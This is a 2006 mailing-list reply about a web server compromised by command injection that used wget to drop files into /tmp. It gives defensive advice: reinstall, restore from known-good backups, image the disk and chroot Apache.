On 4 Jan 2006, at 15:51, Pete Vickers wrote: > Standard advise is to reinstall the o/s (3.8 ? ;-) and then _data_ > only from know good backup. You could use a boot cdrom & dd off an > image of the disk for later analysis if you want first.
It seems that the files have been uploaded, but they haven't actually caused any damage, or even been run. Unfortunately, I don't have the resources to mount a full investigation. Grep'ing every httpd log on the machine has produced no more information, but the fact that the actual wget output was in the httpd logs leads me to think that was the way in. > Is there some attack vector like php or such available on the > machine ? maybe they used that to retrieve & write the file? The messages in the log file indicate that they used some command injection in a script to call wget and download the files into /tmp. I'm fairly sure it was via a bad script, and I'm trying to locate which script was used, so far with no success. > ... but access to /tmp is tricky from a chrooted httpd ! Legacy sites mean that we haven't tried to chroot apache yet. I think it's probably time to bite the bullet and get this done :) Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
